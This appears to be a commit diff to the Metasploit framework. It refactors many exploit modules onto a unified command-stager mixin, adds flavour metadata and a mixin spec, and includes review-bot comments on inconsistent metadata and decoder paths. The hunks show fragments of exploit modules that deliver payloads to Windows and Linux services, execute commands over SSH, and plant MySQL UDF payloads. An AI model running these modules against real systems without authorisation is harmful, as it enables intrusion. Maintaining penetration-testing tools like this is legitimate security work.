@ -45,7 +45,8 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'tftp'
}
],
['Linux Universal',
@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")


@ -12,7 +12,7 @@ class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
@ -56,7 +56,8 @@ class Metasploit4 < Msf::Exploit::Remote
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
},
],
],


@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
@ -66,7 +66,8 @@ class Metasploit4 < Msf::Exploit::Remote
[ 'Windows x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
}
]
],


@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
@ -67,7 +67,8 @@ class Metasploit4 < Msf::Exploit::Remote
[ 'Windows x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
}
]
],


@ -9,7 +9,7 @@ require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStagerBourne
include Msf::Exploit::CmdStager
attr_accessor :ssh_socket
@ -46,21 +46,22 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
}
],
[ 'Linux x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux'
},
}
],
[ 'OSX x86',
{
'Arch' => ARCH_X86,
'Platform' => 'osx'
},
],
}
]
],
'CmdStagerFlavor' => %w{ bourne echo printf },
'DefaultTarget' => 0,
# For the CVE
'DisclosureDate' => 'Jan 01 1999'
@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def execute_command(cmd, opts = {})
vprint_status("Executing #{cmd}")
begin
Timeout.timeout(3) do
self.ssh_socket.exec!("#{cmd}\n")
@ -125,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
execute_cmdstager({:linemax => 500})
end
end


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
include Msf::Exploit::EXE
def initialize(info={})
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('TARGETURI', [true, 'The base path to the ZeroShell instance', '/'])
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def uri
@ -149,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
@session = login(admin_password)
execute_cmdstager
execute_cmdstager({:flavor => :echo})
end
end
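Review bot: The flavor is fixed only at the call site, `execute_cmdstager({:flavor => :echo})`, and no `'CmdStagerFlavor'` entry is added to the module's info hash, unlike most other modules touched by this commit. The spec added for the mixin shows `compatible_flavor?` returning true when no target flavor is declared, so the compatibility check passes vacuously for this module. Declaring `'CmdStagerFlavor' => 'echo'` in the info hash would keep the metadata and the hard-coded call in agreement. The same applies to the later modules in this commit that deregister `CMDSTAGER::FLAVOR` and pass `:flavor => :vbs` or `:flavor => :tftp` directly. The enclosing methods start outside the visible hunks, so an existing entry elsewhere in the info hash cannot be ruled out.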


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Privileged' => true,
'Platform' => 'win',
'CmdStagerFlavor' => 'tftp',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 26 2010'))
@ -50,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DefaultTarget' => 0,
@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")


@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(9090),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
end
def check
@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~3950
execute_cmdstager({:linemax => 3950})
execute_cmdstager({:flavor => :vbs, :linemax => 3950})
end
def execute_command(cmd, opts = {})


@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DisclosureDate' => 'Jun 09 2009',
'DefaultTarget' => 0))
end


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Tested on Windows XP and Windows 2003
[ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultOptions' =>
{
'WfsDelay' => 5


@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => 'Apr 13 2011',
@ -52,11 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")


@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'vbs',
'Targets' =>
[
[ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ]
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'DisclosureDate' => 'Jul 29 2013'))
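Review bot: The renamed default `'CMDSTAGER::DECODER'` still builds its path from `Msf::Config.data_directory`, while the mixin's `DECODERS` table and the WinRM module changed in this same commit use `File.join(Msf::Config.install_root, "data", ...)`. If the two roots can ever differ (not verifiable from this page), modules would read decoder stubs from different directories. Using one form everywhere, for example `File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_noquot")`, removes that ambiguity. The other module in this commit that sets a `vbs_b64_noquot` default has the same mix. The `DefaultOptions` hash sits inside an `initialize` that starts outside the hunk.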


@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => 'Jul 13 2010',
@ -53,11 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
@ -43,6 +43,7 @@ class Metasploit3 < Msf::Exploit
}
]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Privileged' => false
))


@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: This cannot be an HttpClient module since the response from the server
# is not a valid HttpResponse
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ]
],
'CmdStagerFlavor' => 'tftp',
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2001'
))
@ -191,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Use the CMD stager to get a payload running
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
execute_cmdstager({:temp => '.', :linemax => 1400, :cgifname => exe_fname})
# Save these file names for later deletion
@exe_cmd_copy = exe_fname


@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
def initialize
super(
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
# w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'tftp',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 17 1998'
)


@ -7,7 +7,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def execute_command(cmd, opts = {})
@ -159,7 +159,7 @@ Processor-Speed=#{processor_speed}
# CmdStagerVBS was tested here as well, however delivery took roughly
# 30 minutes and required sending almost 350 notification messages.
# size constraint requirement for SQLi is: linemax => 393
execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'})
execute_cmdstager({:delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp})
end
def on_new_session(client)


@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'Platform' => 'win',
'Targets' =>
@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
Opt::RPORT(5555),
OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
],
self.class)
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
end
def check
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name =~ /VBScript CMDStager/
# 7500 just in case, to be sure the command fits after
# environment variables expansion
execute_cmdstager({:linemax => 7500})
execute_cmdstager({:flavor => :vbs, :linemax => 7500})
elsif target.name =~ /Powershell/
# Environment variables are not being expanded before, neither in CreateProcess
command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")


@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0
))


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
#include Msf::Exploit::CmdStagerDebugAsm
#include Msf::Exploit::CmdStagerDebugWrite
#include Msf::Exploit::CmdStagerTFTP
@ -58,6 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'May 30 2000'
))


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -83,6 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'May 30 2000'
))


@ -9,43 +9,44 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On
default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
permissions not enforced, and the MySQL service runs as LocalSystem.
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On
default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
permissions not enforced, and the MySQL service runs as LocalSystem.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
and sys_exec() functions.
},
'Author' =>
[
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
# Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
# Advice from 2005 on securing MySQL on Windows, kind of helpful.
[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
and sys_exec() functions.
},
'Author' =>
[
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
# Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
# Advice from 2005 on securing MySQL on Windows, kind of helpful.
[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
))
register_options(
[


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -40,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This module has been tested on Oracle 10g Release 1
# where the Oracle Job Scheduler runs as SYSTEM on Windows
'Targets' => [['Automatic',{}]],
'CmdStagerFlavor' => 'vbs',
'Privileged' => true,
'DisclosureDate' => 'Jan 01 2007',
'DefaultTarget' => 0))


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 05 2013'


@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::WinRM
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
delivery: Powershell 2.0 and VBS CmdStager.
The module will check if Powershell 2.0 is available, and if so uses
that method. Otherwise it falls back to the VBS Cmdstager which is
that method. Otherwise it falls back to the VBS CmdStager which is
less stealthy.
IMPORTANT: If targeting an x64 system with the Powershell method
@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'WfsDelay' => 30,
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
'CMDSTAGER::DECODER' => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")
},
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
@ -59,12 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('PASSWORD', [ true, 'A specific password to authenticate with' ]),
], self.class
)
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_sleep")]),
], self.class)
deregister_options('CMDSTAGER::FLAVOR')
@compat_mode = false
end
@ -78,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
return if path.nil?
exec_script(path)
else
execute_cmdstager
execute_cmdstager({:flavor => :vbs})
end
handler
end


@ -0,0 +1,698 @@
require 'spec_helper'
require 'msf/core'
require 'msf/core/exploit/cmdstager'
describe Msf::Exploit::CmdStager do
def create_exploit(info ={})
mod = Msf::Exploit.allocate
mod.extend described_class
mod.send(:initialize, info)
mod
end
describe "#select_cmdstager" do
subject do
create_exploit
end
context "when no flavor" do
it "raises ArgumentError" do
expect { subject.select_cmdstager }.to raise_error(ArgumentError, /Unable to select CMD Stager/)
end
end
context "when correct flavor" do
context "with default decoder" do
let(:flavor) do
:vbs
end
before do
subject.select_cmdstager(:flavor => flavor)
end
it "selects flavor" do
expect(subject.flavor).to eq(flavor)
end
it "selects default decoder" do
expect(subject.decoder).to eq(subject.default_decoder(flavor))
end
end
context "without default decoder" do
let(:flavor) do
:tftp
end
before do
subject.select_cmdstager(:flavor => flavor)
end
it "selects flavor" do
expect(subject.flavor).to eq(flavor)
end
it "hasn't decoder" do
expect(subject.decoder).to be_nil
end
end
context "with incompatible target" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Linux',
{
'Platform' => 'linux',
'CmdStagerFlavor' => 'tftp'
}
]
]
})
end
let(:flavor) do
:vbs
end
it "raises ArgumentError" do
expect { subject.select_cmdstager(:flavor => flavor) }.to raise_error(ArgumentError, /The CMD Stager '\w+' isn't compatible with the target/)
end
end
end
end
describe "#default_decoder" do
subject do
create_exploit
end
context "when valid flavor as input" do
context "with default decoder" do
let(:flavor) do
:vbs
end
let(:expected_decoder) do
described_class::DECODERS[:vbs]
end
it "returns the decoder path" do
expect(subject.default_decoder(flavor)).to eq(expected_decoder)
end
end
context "without default decoder" do
let(:flavor) do
:bourne
end
it "returns nil" do
expect(subject.default_decoder(flavor)).to be_nil
end
end
end
context "when invalid flavor as input" do
let(:flavor) do
:invalid_flavor
end
it "returns nil" do
expect(subject.default_decoder(flavor)).to be_nil
end
end
context "when nil flavor as input" do
let(:flavor) do
nil
end
it "should be nil" do
expect(subject.default_decoder(flavor)).to be_nil
end
end
end
describe "#module_flavors" do
context "when the module hasn't CmdStagerFlavor info" do
context "neither the target" do
subject do
create_exploit
end
it "returns empty array" do
expect(subject.module_flavors).to eq([])
end
end
context "the target has CmdStagerFlavor info" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Windows',
{
'CmdStagerFlavor' => 'vbs'
}
]
]
})
end
let(:expected_flavor) do
['vbs']
end
it "returns an array with the target flavor" do
expect(subject.module_flavors).to eq(expected_flavor)
end
end
end
context "when the module has CmdStagerFlavor info" do
context "but the target hasn't CmdStagerFlavor info" do
subject do
create_exploit('CmdStagerFlavor' => 'vbs')
end
let(:expected_flavor) do
['vbs']
end
it "returns an array with the module flavor" do
expect(subject.module_flavors).to eq(expected_flavor)
end
end
context "and the target has CmdStagerFlavor info" do
subject do
create_exploit({
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Targets' =>
[
['Windows TFTP',
{
'CmdStagerFlavor' => 'tftp'
}
]
]
})
end
let(:expected_flavor) do
['vbs', 'tftp']
end
it "returns an array with all the flavors available to the module" do
expect(subject.module_flavors).to eq(expected_flavor)
end
end
end
end
describe "#target_flavor" do
context "when the module hasn't CmdStagerFlavor info" do
context "neither the target" do
subject do
create_exploit
end
it "returns nil" do
expect(subject.target_flavor).to be_nil
end
end
context "the target has CmdStagerFlavor info" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Windows',
{
'CmdStagerFlavor' => 'vbs'
}
]
]
})
end
let(:expected_flavor) do
'vbs'
end
it "returns the target flavor" do
expect(subject.target_flavor).to eq(expected_flavor)
end
end
end
context "when the module has CmdStagerFlavor info" do
context "but the target hasn't CmdStagerFlavor info" do
subject do
create_exploit('CmdStagerFlavor' => 'vbs')
end
let(:expected_flavor) do
'vbs'
end
it "returns the module flavor" do
expect(subject.target_flavor).to eq(expected_flavor)
end
end
context "and the target has CmdStagerFlavor info" do
subject do
create_exploit({
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'Targets' =>
[
['Windows TFTP',
{
'CmdStagerFlavor' => 'tftp'
}
]
]
})
end
let(:expected_flavor) do
'tftp'
end
it "returns the target flavor" do
expect(subject.target_flavor).to eq(expected_flavor)
end
end
end
end
describe "#compatible_flavor?" do
context "when there isn't target flavor" do
subject do
create_exploit
end
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "when the target flavor is a string" do
subject do
create_exploit('CmdStagerFlavor' => 'vbs')
end
context "and good flavor" do
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "and bad flavor" do
let(:flavor) do
:tftp
end
it "isn't compatible" do
expect(subject.compatible_flavor?(flavor)).to be_false
end
end
end
context "when the target flavor is a symbol" do
subject do
create_exploit('CmdStagerFlavor' => :vbs)
end
context "and good flavor" do
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "and bad flavor" do
let(:flavor) do
:tftp
end
it "isn't compatible" do
expect(subject.compatible_flavor?(flavor)).to be_false
end
end
end
context "when the target flavor is an Array" do
subject do
create_exploit('CmdStagerFlavor' => ['vbs', :tftp])
end
context "and good flavor" do
let(:flavor) do
:vbs
end
it "is compatible" do
expect(subject.compatible_flavor?(flavor)).to be_true
end
end
context "and bad flavor" do
let(:flavor) do
:echo
end
it "isn't compatible" do
expect(subject.compatible_flavor?(flavor)).to be_false
end
end
end
end
describe "#guess_flavor" do
context "when the module hasn't targets" do
context "neither platforms" do
subject do
create_exploit
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
context "but platforms" do
context "one platform with default flavor" do
let(:platform) do
'win'
end
let(:expected_flavor) do
:vbs
end
subject do
create_exploit('Platform' => platform)
end
it "guess the platform defulat flavor" do
expect(subject.guess_flavor).to eq(expected_flavor)
end
end
context "one platform without default flavor" do
let (:platform) do
'java'
end
subject do
create_exploit('Platform' => platform)
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
context "two platforms" do
let(:platform) do
['unix', 'linux']
end
subject do
create_exploit('Platform' => platform)
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
end
end
context "when the module has one target" do
context "and the target has one platform" do
context "with default flavor"do
let (:expected_flavor) do
:vbs
end
let (:platform) do
'win'
end
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Windows',
{
'Platform' => platform
}
]
]
})
end
it "guess the target flavor" do
expect(subject.guess_flavor).to eq(expected_flavor)
end
end
context "without default flavor" do
let (:platform) do
'java'
end
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['Java',
{
'Platform' => platform
}
]
]
})
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
end
context "the target has two platforms" do
subject do
create_exploit({
'DefaultTarget' => 0,
'Targets' =>
[
['MultiPlatform',
{
'Platform' => %w{ linux unix}
}
]
]
})
end
it "doesn't guess" do
expect(subject.guess_flavor).to be_nil
end
end
end
end
describe "#select_flavor" do
context "when flavor set in the datastore" do
subject do
create_exploit({
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'vbs'
}
})
end
let(:datastore_flavor) do
:vbs
end
it "returns the datastore flavor" do
expect(subject.select_flavor).to eq(datastore_flavor)
end
context "and flavor set in the opts" do
let(:opts_flavor) do
:bourne
end
it "returns the opts flavor" do
expect(subject.select_flavor(:flavor => :bourne)).to eq(opts_flavor)
end
end
end
end
describe "#select_decoder" do
context "when decoder set in the datastore" do
let(:decoder) do
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
end
subject do
create_exploit({
'DefaultOptions' => {
'CMDSTAGER::DECODER' => decoder
}
})
end
it "returns datastore flavor" do
expect(subject.select_decoder).to eq(decoder)
